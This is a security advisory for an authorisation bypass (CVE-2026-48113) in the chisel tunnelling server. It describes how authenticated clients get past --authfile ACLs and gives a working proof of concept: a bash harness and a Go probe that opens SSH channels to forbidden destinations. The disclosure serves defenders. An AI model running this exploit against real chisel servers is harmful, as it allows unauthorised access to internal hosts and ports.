PT-2026-48931 · Go · Github.Com/Jpillora/Chisel
Published
2026-06-12
·
Updated
2026-06-12
·
CVE-2026-48113
CVSS v4.0
8.5
High
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:H/SI:H/SA:L |
Summary
Authenticated chisel clients can bypass
--authfile ACL restrictions and tunnel traffic to arbitrary destinations reachable from the server. The ACL is enforced only during the initial handshake against declared remotes, but never on subsequent SSH channels that carry actual traffic. A malicious client authenticates with a permitted remote, then opens channels to any host:port it wants.Details
The chisel server validates user ACLs in two places but is missing validation in one of the important places.
The
server/server handler.go checks the ACL, during the initial config handshake:for , r := range c.Remotes {
if user != nil {
addr := r.UserAddr()
if !user.HasAccess(addr) {
failed(s.Errorf("access to '%s' denied", addr))
return
}
}
}
r.Reply(true, nil)This validates the declared remote list from the client's config request. It runs once, at connection setup. But in
share/tunnel/tunnel out ssh.go ACL aren't being checked, when the server processes actual traffic channels:func (t *Tunnel) handleSSHChannel(ch ssh.NewChannel) {
remote := string(ch.ExtraData()) // client-controlled
hostPort, proto := settings.L4Proto(remote)
sshChan, reqs, err := ch.Accept() // accepted unconditionally
// ...
err = t.handleTCP(l, stream, hostPort) // dials whatever client said
}
func (t *Tunnel) handleTCP(l *cio.Logger, src io.ReadWriteCloser, hostPort string) error {
dst, err := net.Dial("tcp", hostPort) // no ACL check
// ...
}The
tunnel.Config struct has no User field, no allowed-address list, and no ACL callback. The user context from server handler.go is never propagated to the tunnel layer:type Config struct {
*cio.Logger
Inbound bool
Outbound bool
Socks bool
KeepAlive time.Duration
// ------- No User, no AllowedRemotes, no ACL
}Since
ch.ExtraData() is fully controlled by the SSH client, any authenticated user can open channels to arbitrary destinations after passing the handshake with a permitted remote.PoC
Directory structure format:
poc
├── poc.sh
└── probe
├── go.mod
├── go.sum
└── main.gopoc.sh
#!/usr/bin/env bash
# Requires: Go, nc (netcat)
set -euo pipefail
DIR="$(cd "$(dirname "$0")" && pwd)"
REPO="$DIR/.."
freeport() { python3 -c "import socket;s=socket.socket();s.bind(('',0));print(s.getsockname()[1]);s.close()"; }
cleanup() { kill $SERVER $LISTENER 2>/dev/null; rm -f "$AUTH"; }
trap cleanup EXIT
# Build
echo "[*] Building..."
(cd "$REPO" && go build -o /tmp/ chisel .)
(cd "$DIR/probe" && go build -o /tmp/ probe .)
# Ports
SP=$(freeport); AP=$(freeport); BP=$(freeport)
echo "[*] Server :$SP Allowed :$AP Blocked :$BP"
# Authfile — user:pass may only reach 127.0.0.1:$AP
AUTH=$(mktemp)
printf '{"user:pass":["^127.0.0.1:%s$"]}
' "$AP" > "$AUTH"
# Start forbidden-target listener and chisel server
(echo "FORBIDDEN TARGET REACHED" | nc -l 127.0.0.1 "$BP") & LISTENER=$!
/tmp/ chisel server --port "$SP" --authfile "$AUTH" --key seed 2>/dev/null & SERVER=$!
sleep 1
# Exploit
CHISEL SERVER="127.0.0.1:$SP" ALLOWED PORT="$AP" BLOCKED PORT="$BP" /tmp/ probemain.go
// Chisel ACL bypass probe. Authenticates with an allowed remote,
// then opens an SSH channel to a forbidden destination via ExtraData.
package main
import (
"encoding/json"
"fmt"
"net"
"net/http"
"os"
"time"
"github.com/gorilla/websocket"
"github.com/jpillora/chisel/share/cnet"
"github.com/jpillora/chisel/share/settings"
"golang.org/x/crypto/ssh"
)
func main() {
server := os.Getenv("CHISEL SERVER")
allowed := os.Getenv("ALLOWED PORT")
blocked := os.Getenv("BLOCKED PORT")
// WebSocket → net.Conn
ws, , err := (&websocket.Dialer{
HandshakeTimeout: 5 * time.Second,
Subprotocols: []string{"chisel-v3"},
}).Dial("ws://"+server, http.Header{})
check(err, "ws dial")
conn := cnet.NewWebSocketConn(ws)
// SSH handshake
sc, chans, reqs, err := ssh.NewClientConn(conn, "", &ssh.ClientConfig{
User: "user",
Auth: []ssh.AuthMethod{ssh.Password("pass")},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
})
check(err, "ssh")
go ssh.DiscardRequests(reqs)
go func() { for c := range chans { c.Reject(ssh.Prohibited, "") } }()
// Send config with only the allowed remote
r, := settings.DecodeRemote(fmt.Sprintf("0.0.0.0:%s:127.0.0.1:%s", allowed, allowed))
cfg, := json.Marshal(settings.Config{Version: "0", Remotes: []*settings.Remote{r}})
ok, reply, err := sc.SendRequest("config", true, cfg)
check(err, "config")
if !ok {
die("config rejected: %s", reply)
}
fmt.Printf("[+] Config accepted (only 127.0.0.1:%s allowed)
", allowed)
// Open channel to BLOCKED destination
target := net.JoinHostPort("127.0.0.1", blocked)
ch, cr, err := sc.OpenChannel("chisel", []byte(target))
if err != nil {
fmt.Printf("[-] REJECTED — server refused %s
", target)
os.Exit(1)
}
go ssh.DiscardRequests(cr)
fmt.Printf("[!] ACCEPTED — channel opened to %s
", target)
// Read response from forbidden target
buf := make([]byte, 256)
done := make(chan int, 1)
go func() { n, := ch.Read(buf); done <- n }()
select {
case n := <-done:
if n > 0 {
fmt.Printf("[!] Data: %s
", buf[:n])
}
case <-time.After(3 * time.Second):
}
fmt.Println("CONFIRMED — ACL bypass: server dialed unauthorized destination")
ch.Close()
sc.Close()
}
func check(err error, ctx string) {
if err != nil {
die("%s: %v", ctx, err)
}
}
func die(f string, a ...interface{}) {
fmt.Fprintf(os.Stderr, f+"
", a...)
os.Exit(1)
}Impact
- Complete ACL bypass: The
--authfileaddress restrictions are enforceable only on paper - Authenticated users can reach any host/port the server process can dial
Fix
Incorrect Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Github.Com/Jpillora/Chisel